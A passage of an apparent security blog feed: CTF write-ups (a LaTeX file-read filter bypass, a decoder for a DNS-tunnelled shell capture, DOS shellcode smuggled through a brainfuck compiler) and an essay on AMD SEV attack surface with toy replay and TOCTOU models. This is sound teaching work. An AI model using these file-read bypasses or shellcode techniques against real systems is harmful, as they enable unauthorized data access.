aha moment for me after spending such a long time on this challenge.)&lt;/p&gt;
&lt;p&gt;First, we upload a simple tex file &lt;cite&gt;first.tex&lt;/cite&gt; and compile it to generate a log
file &lt;cite&gt;create tex first&lt;/cite&gt;:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
\documentclass{minimal}
\begin{document}
\end{document}
\q
&lt;/pre&gt;
&lt;p&gt;Then we compile it &lt;cite&gt;compile first&lt;/cite&gt; and upload a second tex file &lt;cite&gt;create tex
second&lt;/cite&gt;:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
\documentclass{minimal}
\usepackage{ystring}
\def\b{.}
\def\y{.}
\def\z{flag}
\newread\file
\immediate\openin\file=first.log
\immediate\read\file to\fileline
\immediate\message{HERE}
\StrMid{\fileline}{62}{62}[\c]
\immediate\message{\c}
\immediate\message{END}
\immediate\closein\file
\immediate\openin\file=\b\b\c\b\b\c\z
\loop\unless\ifeof\file
    \read\file to\fileline
    \message{\fileline}
\repeat
\closein\file
\begin{document}
\end{document}
&lt;/pre&gt;
&lt;p&gt;This LaTeX file opens the &lt;cite&gt;first.log&lt;/cite&gt; log file and uses the &lt;cite&gt;ystring&lt;/cite&gt; library to
extract the 62nd character, concatenates the individual components to open the
flag and print it to the log file. Now, to use the &lt;cite&gt;ystring&lt;/cite&gt; library we need to
upload it. We start by copying &lt;cite&gt;xstring.sty&lt;/cite&gt; and &lt;cite&gt;xstring.tex&lt;/cite&gt; to local files
and replace all occurrences of &lt;cite&gt;xs&lt;/cite&gt; with &lt;cite&gt;ys&lt;/cite&gt; to overcome the last filter
restriction and then upload these two files as well. After compiling &lt;cite&gt;compile
second&lt;/cite&gt; we can access the log file and get the flag.  The log file can then be
displayed through &lt;cite&gt;show log second&lt;/cite&gt; and we get the flag:
&lt;cite&gt;33C3_pdflatex_1s_t0t4lly_s3cur3!&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;Note that I also went through the trouble of getting a Stack Exchange account and
asked my &lt;a class="reference external" href="http://tex.stackexchange.com/questions/346039/extract-a-character-at-position-x-from-a-string-using-primitives"&gt;LaTeX question there&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="exfil-100-points"&gt;
&lt;h2&gt;exfil (100 points)&lt;/h2&gt;
&lt;p&gt;Exfil was a fun forensics challenge that asked us to extract data from a pcap.
The pcap file contains a remote shell session of an attacker that is obfuscated
through an UDP/DNS channel that includes a lot of redundancy. Thankfully we
received the server along with the challenge which made decoding much easier. I
wrote a Python-based decoder that dumps both the server side stream and the
client side stream to files. The client side stream allowed me to extract a
private key and the server side stream allowed me to dump &lt;cite&gt;server.docx.gpg&lt;/cite&gt;
which could then be decoded with the extracted private key:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#!/usr/bin/env python
from dnslib import *
import dpkt
import base64
import struct

domain = 'eat-sleep-pwn-repeat.de'

def decode_b32(s):
    s = s.upper()
    for i in range(10):
        try:
            return base64.b32decode(s)
        except:
            s += b'='
    raise ValueError('Invalid base32')

def parse_name(label):
    return decode_b32(b''.join(label.label[:-domain.count('.')-1]))

def parse_nameH(label):
    label = label[:-len(domain)-2]
    label = label.translate(None, '.')
    return decode_b32(label)

sseq = 0
sack = 0
cdata = b''
sdata = b''

f = open('dump.pcap', 'rb')
pcap = dpkt.pcap.Reader(f)
for ts, buf in pcap:
    #print(ts, len(buf))
    eth = dpkt.ethernet.Ethernet(buf)
    ip = eth.data
    udp = ip.data
    #dns = dpkt.dns.DNS(udp.data)
    #for qname in dns.qd:
    #    print binascii.hexlify(parse_name(qname.name))
    query = DNSRecord.parse(udp.data)
    packet = parse_name(query.q.qname)
    conn_id, seq, ack = struct.unpack('&amp;lt;HHH', packet[:6])
    data = packet[6:]
    #print data
    if seq == sack:
        #print('s %d %d %d\n' % (conn_id, seq, ack))
        sdata += data
        #print data
        sack += len(data)
    for x in query.rr:
        pack2 = parse_nameH(str(x.rdata))
        conn_id2, seq2, ack2 = struct.unpack('&amp;lt;HHH', pack2[:6])
        data2 = pack2[6:]
        if seq2 &amp;gt; sseq:
            cdata += data2
            print data2
            sseq = seq2
        if seq2 == sseq and len(cdata) &amp;lt; sseq:
            cdata += data2
        print('x %d %d %d %d %d\n' % (conn_id2, seq2, ack2, sack, sseq))

        #if ack2 &amp;gt; sseq:
        #    forget = ack2 - sseq
        #    #cdata += data2
        #    sseq += forget
        #    #print('c %d %d %d\n' % (conn_id2, seq2, ack2))
    #print(udp.data[13:udp.data.index('eat')-1])
    #x = decode_b32(udp.data[13:udp.data.index('eat')-1])
    #print(str(x))

print &amp;quot;sdata&amp;quot;
print sdata
print &amp;quot;cdata&amp;quot;
print cdata

secret = sdata[sdata.index('START_OF_FILE')+13:sdata.index('END_OF_FILE')]
with open('secret.docx.gpg', 'w') as f:
    f.write(secret)
    f.close()
&lt;/pre&gt;
&lt;p&gt;Running the decryption &lt;cite&gt;gpg --decrypt secret.docx.gpg &amp;gt; secret.docx&lt;/cite&gt; then yields
the flag &lt;cite&gt;3C3_g00d_d1s3ct1on_sk1llz_h0mie&lt;/cite&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="x90-150-points"&gt;
&lt;h2&gt;0x90 (150 points)&lt;/h2&gt;
&lt;p&gt;The 0x90 challenge was a fun blast from the past where we connected to a
Slackware 1.01 instance from the early '90s that had a vulnerable version of
&lt;cite&gt;lpr&lt;/cite&gt; with a known privilege escalation. So we could simply google for it and
just reuse &lt;a class="reference external" href="https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/prdelka-vs-GNU-lpr.c"&gt;the exploit&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Uploading the exploit is fun due to the weird remote connection not pasting
escape characters correctly. But I somehow managed to open vi, go into edit
mode, paste the C file, compile it through &lt;cite&gt;gcc exp.c&lt;/cite&gt; and run it. The flag can
then be accessed through &lt;cite&gt;cat /flag.txt&lt;/cite&gt; and yields
&lt;cite&gt;33C3_Th3_0x90s_w3r3_pre3tty_4w3s0m3&lt;/cite&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="misc"&gt;
&lt;h2&gt;Misc&lt;/h2&gt;
&lt;p&gt;Overall, this was a fun CTF but I spent way too much time on the pdfmaker. I've
also looked at the someeta1 challenge, which looked like fun, but did not have
enough time to decode all the templates before the CTF was over.&lt;/p&gt;
&lt;/div&gt;
</content><category term="CTF"></category><category term="CTF"></category><category term="33C3"></category><category term="LaTeX"></category><category term="network"></category><category term="oldschool"></category></entry><entry><title>TUM CTF: boot2brainfuck</title><link href="/blog/2016/1002-TUMCCTF-boot2brainfuck.html" rel="alternate"></link><published>2016-10-02T12:39:00-04:00</published><updated>2016-10-02T12:39:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2016-10-02:/blog/2016/1002-TUMCCTF-boot2brainfuck.html</id><summary type="html">&lt;p&gt;According to the description, hxp provides us with a brainfuck (BF) execution
service where we can send BF programs over netcat and execute them. To help,
they provide us with a script that translated BF programs into a DOS, 16-bit COM
executable.&lt;/p&gt;
&lt;p&gt;Now as a reminder, DOS COM executables are …&lt;/p&gt;</summary><content type="html">&lt;p&gt;According to the description, hxp provides us with a brainfuck (BF) execution
service where we can send BF programs over netcat and execute them. To help,
they provide us with a script that translates BF programs into a DOS, 16-bit COM
executable.&lt;/p&gt;
&lt;p&gt;Now as a reminder, DOS COM executables are loaded at an offset of &lt;cite&gt;0x100&lt;/cite&gt; bytes
(starting therefore at address &lt;cite&gt;0x100&lt;/cite&gt;) and contain up to 64k (&lt;cite&gt;0xFFFF&lt;/cite&gt;) bytes of raw
code and data. Programs are restricted to 64kb of RAM and code; luckily, there are no
protections whatsoever. In addition, we were able to use the good old DOS &lt;cite&gt;0x21&lt;/cite&gt;
interrupt and the &lt;cite&gt;0x13&lt;/cite&gt; BIOS interrupt to request functionalities from the
system. We were also told that the flag was at &lt;cite&gt;A:FLAG.TXT&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;Looking at the bf &amp;quot;compiler&amp;quot;, we notice that it's a simple pattern-matching
compiler that emits a prefix to set up the environment, translates all BF
instructions using simple patterns (where we also learn about some of the DOS
interrupts, confirming the suspicion that we'll run in a DOS VM), and an
epilogue that uses a DOS interrupt to exit the program, followed by 30kb of 0
bytes used as BF storage.&lt;/p&gt;
&lt;p&gt;As a reminder on how BF works, refer to the
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Brainfuck"&gt;BF wiki page&lt;/a&gt;, or our
&lt;a class="reference external" href="https://github.com/HexHive/printbf"&gt;printbf interpreter for format strings&lt;/a&gt;.
So having worked with BF quite a bit before, this challenge was right down my
alley.&lt;/p&gt;
&lt;p&gt;As a first step, I started writing shellcode to use DOS interrupts to open,
read, and print the flag file. This turned out to be harder than expected as
NASM was making it very difficult to write 16-bit code. Also, there are way more
restrictions on registers than I'm actually used to. After some tweaking I used
existing shellcode techniques to locate pointers and pieced together a couple of
DOS system calls to open and read in the file:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
bits 16
org 0x100

; set up ptrs
call past
db &amp;quot;A:\FLAG.TXT&amp;quot;,0
past:
pop dx

; open file handle
mov ah, 3Dh ; open file
mov al, 0h  ; 0 read file
; dx contains ptr to filename
;mov dx, file
int 21h

; read A:\FLAG.TXT
mov bx, ax ; handle we get when opening a file
mov ah, 3Fh ; read file
mov cx, 20 ; number of bytes to read
; dx contains pointer to buffer
int 21h

; let's try to use the fancy print
;pop dx
;push dx
; dx contains pointer to buffer
;mov dx, file
mov cx, ax ; len to print
mov bx, 1 ; stdout
mov ah, 40h ; write file/device
int 21h

mov ah, 0x4c
int 21h            ; exit
&lt;/pre&gt;
&lt;p&gt;As you can see, when reading the file I finally fixed the length to 20 bytes. When
developing the shellcode I used 255 bytes, which led me down a nasty, sad detour.
More on this later.&lt;/p&gt;
&lt;p&gt;Piping the shellcode through NASM &lt;cite&gt;nasm -f bin -o print.com dosprint.asm&lt;/cite&gt; we get
a DOS COM executable that we can test using dosemu. Now that we are happy with
the shellcode, we turn it into a BF program.&lt;/p&gt;
&lt;p&gt;First off, we need to make sure that the epilogue (&lt;cite&gt;mov ah,0x4C; int 0x21&lt;/cite&gt;) of
the compiled BF program does not trigger. Luckily, the data area starts right
after the code area and we can just decrement the BF data pointer into the code.
To keep it simple, we decrement the data pointer twice to point to the two-byte
&lt;cite&gt;int 0x21&lt;/cite&gt; instruction (&lt;cite&gt;0xCD21&lt;/cite&gt;) and we decrement the &lt;cite&gt;0xCD&lt;/cite&gt; value to &lt;cite&gt;0xB4&lt;/cite&gt; so
that it turns into a &lt;cite&gt;mov ah, 0x21&lt;/cite&gt; instruction, rendering the epilogue useless.
After incrementing the data pointer twice we can now simply transcode our DOS
program into the BF data memory. Having ensured that the exit does not trigger,
we slide into the data memory and start executing the values we place there.
Due to 30kb data memory, we are restricted to roughly 34kb if BF program, which
leaves us roughly 10-15k BF instructions as they are encoded to 1 or 3 bytes
for increment/decrement of the data pointer and the data values.&lt;/p&gt;
&lt;p&gt;My translator looks as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
import sys

# translate the DOS COM binary into a BF program (Python 3)
with open(&amp;quot;print.com&amp;quot;, &amp;quot;rb&amp;quot;) as f:
    # patch the epilogue: walk two cells left into the code and turn the
    # 0xCD (int) opcode into 0xB4 by emitting 0xcd - 0xb4 decrements
    sys.stdout.write(&amp;quot;&amp;lt;&amp;lt;&amp;quot;)
    sys.stdout.write(&amp;quot;-&amp;quot; * (0xcd - 0xb4))
    sys.stdout.write(&amp;quot;&amp;gt;&amp;gt;&amp;quot;)
    # transcode each byte; BF cells wrap modulo 256, so emit whichever
    # of +/- reaches the byte value in fewer steps
    for byte in f.read():
        if 256 - byte &amp;lt; byte:
            sys.stdout.write(&amp;quot;-&amp;quot; * (256 - byte))
        else:
            sys.stdout.write(&amp;quot;+&amp;quot; * byte)
        sys.stdout.write(&amp;quot;&amp;gt;&amp;quot;)
&lt;/pre&gt;
&lt;p&gt;This translates our DOS COM into a BF program that we can pass to the BF
executor service. Testing this in vivo did not lead to the expected results
and my exploit did not work. For quite a long time I wondered what was
happening (fixing some bugs in the process). After a while I tested with
read sequences shorter than 255 bytes (wondering whether a read request larger
than the file would fail) and if I requested less than 28 bytes from the
file, the read actually succeeded and I received parts of the file.&lt;/p&gt;
&lt;p&gt;So after some more tinkering I read the flag in 4 steps, reading 20 bytes each
time &lt;a class="footnote-reference" href="#footnote-1" id="footnote-reference-1"&gt;[*]&lt;/a&gt; (adjusting my DOS print program accordingly) and concatenating the
result into the &lt;cite&gt;hxp{ju57 l1k3 4 7ur1n6 m4ch1n3 bu7 w17h l1m173d 5p4c3}&lt;/cite&gt; flag,
resulting in 165 points for team b01lers. I must say that this was a very
interesting challenge and a trip back to DOS assembly that I had long
forgotten. And, regarding the failed read, I still wonder what I screwed up
there.&lt;/p&gt;
&lt;table class="docutils footnote" frame="void" id="footnote-1" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-1"&gt;[*]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;Turns out the 28 byte restriction was due to a bug in my code. During
testing, I moved the string for the filename from the end to the top of
the code. When reading, I reused the buffer for the filename, overwriting
my code towards the end. If I read more than 28 bytes, the code after the
read was overwritten. Moving the filename back to the end fixes this
issue and allows me to read the flag in one read system call. Debugging is
hard if you don't have a debugger or any feedback and it's 2am.
(HT &amp;#64;kkotowicz)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
</content><category term="CTF"></category><category term="CTF"></category><category term="TUMCTF"></category><category term="brainfuck"></category><category term="DOS"></category><category term="shellcode"></category></entry><entry><title>AMD SEV attack surface: a tale of too much trust</title><link href="/blog/2016/0922-AMD-SEV-attack-surface.html" rel="alternate"></link><published>2016-09-22T12:28:00-04:00</published><updated>2016-09-22T12:28:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2016-09-22:/blog/2016/0922-AMD-SEV-attack-surface.html</id><summary type="html">&lt;p&gt;AMD recently announced the new Secure Encrypted Virtualization (SEV) extension
that intends to protect virtual machines against compromised hypervisors/Virtual
Machine Monitors (VMMs). An intended use-case of SEV is to protect a VM against
a malicious cloud provider.  All memory contents are encrypted and the cloud
provider cannot recover any …&lt;/p&gt;</summary><content type="html">&lt;p&gt;AMD recently announced the new Secure Encrypted Virtualization (SEV) extension
that intends to protect virtual machines against compromised hypervisors/Virtual
Machine Monitors (VMMs). An intended use-case of SEV is to protect a VM against
a malicious cloud provider.  All memory contents are encrypted and the cloud
provider cannot recover any of the data inside. The root of trust lies with AMD
and they control all access to the keys.&lt;/p&gt;
&lt;p&gt;SEV is a rather new feature and so far, I have only come across the announcement of
the patch &lt;a class="footnote-reference" href="#sevpatch" id="footnote-reference-1"&gt;[2]&lt;/a&gt; and a presentation at a recent KVM forum &lt;a class="footnote-reference" href="#sev" id="footnote-reference-2"&gt;[1]&lt;/a&gt;. The
goal of this blog post is to compare the two new technologies AMD SEV &lt;a class="footnote-reference" href="#sev" id="footnote-reference-3"&gt;[1]&lt;/a&gt;
and Intel SGX &lt;a class="footnote-reference" href="#sgx" id="footnote-reference-4"&gt;[4]&lt;/a&gt; and relate them to the Overshadow &lt;a class="footnote-reference" href="#overshadow-1" id="footnote-reference-5"&gt;[5]&lt;/a&gt; research
paper.&lt;/p&gt;
&lt;p&gt;What Overshadow showed is that it is surprisingly difficult to protect a lower
privileged component from a higher privileged component without significantly
redesigning the lower privileged component. The lower privileged component (the
VM) so far trusted the VMM; once the VMM is removed from the trusted computing
base, any part of the VM that interacts with the VMM must be vetted and
protected against nasty attacks like corrupted data or
time-of-check-to-time-of-use attacks. Such attacks likely allow an attacker to
initiate a ROP/JOP attack or even inject code with knowledge of
writable/executable regions, letting the adversary simply extract data
using the existing I/O channels or spawn a remote shell. But more on that in the
security discussion.&lt;/p&gt;
&lt;div class="section" id="overshadow"&gt;
&lt;h2&gt;Overshadow&lt;/h2&gt;
&lt;p&gt;Overshadow &lt;a class="footnote-reference" href="#overshadow-1" id="footnote-reference-6"&gt;[5]&lt;/a&gt; removes the OS from the trusted computing base,
protecting application data against compromise from a malicious (or corrupted)
OS. Overshadow does not rely on special hardware and is implemented at the VM
level. There are several other trust separation mechanisms but Overshadow was
the first to remove trust from a large OS kernel while keeping most of the
functionality of the OS.&lt;/p&gt;
&lt;p&gt;The VMM presents two different memory views to executing code, depending on the
privilege level.  Whenever the OS accesses application-level pages, they
are encrypted, protecting integrity and confidentiality of the data. The VMM
allows the application process to access the unmodified pages but whenever the
OS accesses the pages, they are transparently encrypted.  This allows the OS to
still handle memory allocation and bookkeeping but keeps the &lt;em&gt;contents&lt;/em&gt; of the
memory pages hidden. The cloaking/uncloaking operations are implemented at the
VMM level.&lt;/p&gt;
&lt;p&gt;A caveat of Overshadow is that several core features of the operating system had
to be reimplemented at the VMM level, increasing the porting and
development effort as well as attack surface.  The cloaking of the address space
at the OS level stops the OS from accessing any memory contents of the
application and all system calls that need such access have to be trapped and
emulated at the VMM level.  In the end, the guest has to call into the
VMM for functions like pipes, file access, signal handling, or thread
creation. Overshadow showed that it is immensely challenging to remove trust
from a higher-privileged component and, to secure the lower level, one has to
reimplement several features of the higher-privileged component at an even
higher trust level, circumventing the now untrusted component. For Overshadow,
several OS components had to be reimplemented at the still trusted VMM level
when the OS became untrusted.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="intel-software-guard-extensions-sgx"&gt;
&lt;h2&gt;Intel Software Guard Extensions (SGX)&lt;/h2&gt;
&lt;p&gt;Intel SGX &lt;a class="footnote-reference" href="#sgx" id="footnote-reference-7"&gt;[4]&lt;/a&gt; allows so-called enclaves to execute orthogonally to, and
protected from, the BIOS, VMM, and OS, removing these components from the trusted
computing base. An enclave is part of a user-space process that contains a set
of pages. SGX guarantees that a software module and its data are protected from
the untrusted environment and can compute on confidential data.  The pages of
the enclave are encrypted to the outside but are accessible inside the enclave.
An enclave is initialized by loading pages into a new enclave, followed by an
attestation. SGX guarantees integrity and confidentiality but the VMM or OS
control scheduling and memory, thereby controlling availability.&lt;/p&gt;
&lt;p&gt;SGX was carefully designed to reduce the interaction between the untrusted
components and the trusted components. The untrusted components control
scheduling and to some extent memory (as the OS/VMM controls how many pages are
mapped to the enclave). The user-space untrusted component of the enclave
controls I/O to the enclave using a per-enclave I/O channel, e.g., a shared
page. The code in the enclave is explicitly designed with this attacker model
and assumes that data coming from the outside is not trusted, vetting any
incoming data.&lt;/p&gt;
&lt;p&gt;The main attack vectors against SGX are side channels: constraining the
number of pages available to the enclave on the software side or observing cache
line fetches on the hardware side to learn access patterns of code and data in
the enclave.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="amd-secure-encrypted-virtualization-sev"&gt;
&lt;h2&gt;AMD Secure Encrypted Virtualization (SEV)&lt;/h2&gt;
&lt;p&gt;AMD SEV &lt;a class="footnote-reference" href="#sev" id="footnote-reference-8"&gt;[1]&lt;/a&gt; protects the memory of each VM and the VMM using an individual
encryption key, managed by the hardware &lt;a class="footnote-reference" href="#sevwp" id="footnote-reference-9"&gt;[3]&lt;/a&gt;. The VMM therefore does not
have access to the decrypted contents of the guest VM. The VMM remains in
control of the execution of the guest VM in terms of (i) memory management, (ii)
scheduling, (iii) I/O control, and (iv) device management. Both the VMM and the
guest VM must be aware of this new security feature and cooperatively enable it.&lt;/p&gt;
&lt;p&gt;When the guest enables SEV, there is a form of attestation that certifies, using
a root of trust that AMD controls, that the VMM actually plays along and allows
this feature (and does not just emulate it using a software implementation on
top of, e.g., QEMU). Interestingly, for SEV, the data is encrypted (protecting
confidentiality) but not integrity protected. The missing integrity protection
allows replay attacks on the crypto level.&lt;/p&gt;
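&lt;p&gt;To see why missing integrity protection matters, consider the following toy model. It uses plain Python with a deterministic XOR keystream as a stand-in for the real hardware crypto; the key, address, and values are made up for illustration. A hypervisor that snapshots a ciphertext page can later write the old ciphertext back, and the guest decrypts stale data without noticing:&lt;/p&gt;

```python
import hashlib

# Toy stand-in for per-VM memory encryption *without* integrity:
# a deterministic keystream derived from a VM key and the address.
# (Hypothetical key/addresses; not the actual SEV construction.)
KEY = b"vm-specific-key"

def xcrypt(addr: int, data: bytes) -> bytes:
    # XOR keystream: the same function encrypts and decrypts
    stream = hashlib.sha256(KEY + addr.to_bytes(8, "little")).digest()
    return bytes(d ^ s for d, s in zip(data, stream))

memory = {0x1000: xcrypt(0x1000, b"balance=100")}
stale = memory[0x1000]                           # VMM snapshots ciphertext
memory[0x1000] = xcrypt(0x1000, b"balance=000")  # guest updates the value
memory[0x1000] = stale                           # VMM replays old ciphertext
print(xcrypt(0x1000, memory[0x1000]))            # guest reads stale data
```

Without an integrity tag bound to the ciphertext, the replayed page decrypts cleanly and the guest has no way to tell it is reading an outdated value.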
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2016/0922/sev.png" /&gt;&lt;/p&gt;
&lt;p&gt;In such a mutually-distrusting scheme not all memory can be encrypted and data
must be passed between isolated components using some form of I/O channel. In
addition, there must be a way to branch somewhere &lt;em&gt;into&lt;/em&gt; the other component.
The VM obviously needs to request I/O from the VMM and interact with the
exported emulated or para-virtualized hardware. In addition, several locations
of the VM need to be exposed to, e.g., deliver exceptions and interrupts.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="security-discussion"&gt;
&lt;h2&gt;Security discussion&lt;/h2&gt;
&lt;p&gt;SEV is similar to Overshadow and SGX as it removes trust from a higher
privileged component. Overshadow still trusts the memory bus, BIOS, and the VMM
while SEV and SGX only trust the AMD or Intel CPU. The two main differences
between SEV and SGX are the amount of code that sits in a protected module and
the intersection between the two privilege domains. SGX places the trusted
enclave outside of all execution domains, orthogonally to existing privilege
levels. Any interaction of the trusted enclave with the untrusted system needs
to go through a narrow interface that can be carefully vetted. SEV &lt;em&gt;removes&lt;/em&gt;
trust from the VMM with all the potential downsides that Overshadow experienced
as well. All existing code in the OS and the applications is now part of the
broader attack surface (side-channel wise) and all interaction between the OS
and the VMM may be attacked or observed by an adversary.&lt;/p&gt;
&lt;p&gt;While SGX draws a clear cut between privilege domains, forcing
developers to design a small API to communicate between privileged and
unprivileged compartments and keeping the amount of code in the trusted
compartment &amp;quot;as small as possible&amp;quot;, SEV seems bloated.&lt;/p&gt;
&lt;p&gt;First off, operating systems inherently trust all higher privileged levels.
The OS must trust any higher privileged level as, due to the hierarchical
design, everything depends on that higher level. Breaking this assumption may lead to
unexpected security issues.&lt;/p&gt;
&lt;p&gt;An SEV domain does not trust the VMM but the VMM may control data that is being
passed into the VM and scheduling of the VM. This allows targeted
time-of-check-to-time-of-use attacks where data is modified by the VMM after the
VM has checked it but before it is being used. This is a very strong attack
vector as code has to be designed with such malicious changes in mind. The code
of individual device drivers, I/O handlers, and interrupt handlers is not designed
with an active, higher-privileged adversary in mind. In addition, the code base
is large, complex, and grew over many years. An adversary who leverages this
attack vector can likely mount a ROP/JOP attack or even inject code to get
control of the underlying VM and then simply extract the data through the
existing I/O channels or spawn a remote shell.  Now, AMD promises to develop
virtio drivers for, e.g., KVM to handle at least the data transfer for (some?)
I/O devices.  What happens to all other interactions remains unclear.  Second,
the large code base of the VM will simplify information leaks and side channels.&lt;/p&gt;
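&lt;p&gt;The time-of-check-to-time-of-use pattern can be sketched in a few lines (a toy model, not actual driver code; the field name and sizes are made up): the guest validates a length field that lives in VMM-controlled shared memory, the VMM flips the value between the check and the use, and the second fetch returns the malicious value:&lt;/p&gt;

```python
# Toy TOCTOU double fetch: the "shared" dict stands in for memory that
# the VMM can modify concurrently while the guest runs.
shared = {"len": 16}
buf = bytearray(16)

def vmm_interferes():
    # the VMM schedules in between check and use and flips the field
    shared["len"] = 4096

n = None
if shared["len"] <= len(buf):  # time of check: the value looks safe
    vmm_interferes()
    n = shared["len"]          # time of use: re-fetched, now malicious
# copying n bytes into buf would now overflow it
print(n, len(buf))
```

Code that copies the validated value into a local variable and never re-reads shared memory avoids the double fetch; the point is that none of the existing guest code was written with this adversary in mind.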
&lt;p&gt;I predict that we as the security community will find plenty of vulnerabilities
in this layer now that the trust is revoked. As SEV will be used in secure
clouds, the data and code will likely become a high-profile target.  As a
hacker, I see large amounts of code suddenly becoming adversary accessible, as
the definition of what an adversary can do has changed, with much more code
and data being &lt;em&gt;accessible&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Intel stepped around this problem by placing the enclave orthogonally to all
privilege domains, thereby not breaking the trust assumptions of existing code.
If you want to use SGX, you will have to design the interface between trusted
and untrusted code while being aware of the attacker model. For SEV, the
attacker model just changed.&lt;/p&gt;
&lt;p&gt;Note that so far only limited information is known and I'm basing my analysis on
the publicly available documents. I could be completely wrong about this, so
please comment and let me know your thoughts. Overall, this is an interesting
technology but I'm wary of the newly exposed attack surface.&lt;/p&gt;
&lt;div class="section" id="changelog"&gt;
&lt;h3&gt;Changelog&lt;/h3&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;09/24/16 Jethro Beekman (&amp;#64;JethroGB) mentioned integrity attacks against AMD SEV.&lt;/li&gt;
&lt;li&gt;09/24/16 twiz (&amp;#64;lazytyped) asked to clarify the ROP attack vector.&lt;/li&gt;
&lt;/ul&gt;
&lt;table class="docutils footnote" frame="void" id="sev" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;[1]&lt;/td&gt;&lt;td&gt;&lt;em&gt;(&lt;a class="fn-backref" href="#footnote-reference-2"&gt;1&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-3"&gt;2&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-8"&gt;3&lt;/a&gt;)&lt;/em&gt; &lt;a class="reference external" href="http://www.linux-kvm.org/images/7/74/02x08A-Thomas_Lendacky-AMDs_Virtualizatoin_Memory_Encryption_Technology.pdf"&gt;AMD's Virtualization Memory Encryption. Thomas Lendacky. KVM Forum'16&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="sevpatch" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-1"&gt;[2]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="https://lkml.org/lkml/2016/8/22/960"&gt;Brijesh Singh. x86: Secure Encrypted Virtualization (AMD). LKML'16&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="sevwp" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;&lt;a class="fn-backref" href="#footnote-reference-9"&gt;[3]&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a class="reference external" href="http://amd-dev.wpengine.netdna-cdn.com/wordpress/media/2013/12/AMD_Memory_Encryption_Whitepaper_v7-Public.pdf"&gt;David Kaplan, Jeremy Powell, and Tom Woller. AMD MEMORY ENCRYPTION. Technical Report. 2016.&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="sgx" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;[4]&lt;/td&gt;&lt;td&gt;&lt;em&gt;(&lt;a class="fn-backref" href="#footnote-reference-4"&gt;1&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-7"&gt;2&lt;/a&gt;)&lt;/em&gt; &lt;a class="reference external" href="https://software.intel.com/en-us/sgx"&gt;Intel Software Guard Extensions.&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class="docutils footnote" frame="void" id="overshadow-1" rules="none"&gt;
&lt;colgroup&gt;&lt;col class="label" /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="label"&gt;[5]&lt;/td&gt;&lt;td&gt;&lt;em&gt;(&lt;a class="fn-backref" href="#footnote-reference-5"&gt;1&lt;/a&gt;, &lt;a class="fn-backref" href="#footnote-reference-6"&gt;2&lt;/a&gt;)&lt;/em&gt; &lt;a class="reference external" href="https://drkp.net/papers/overshadow-asplos08.pdf"&gt;Xiaoxin Chen, Tal Garfinkel, E. Christopher Lewis, Pratap Subrahmanyam, Carl A. Waldspurger, Dan Boneh, Jeffrey Dwoskin, and Dan R.K. Ports. Overshadow: A Virtualization-Based Approach to Retrofitting Protection in Commodity Operating Systems. ASPLOS'08&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
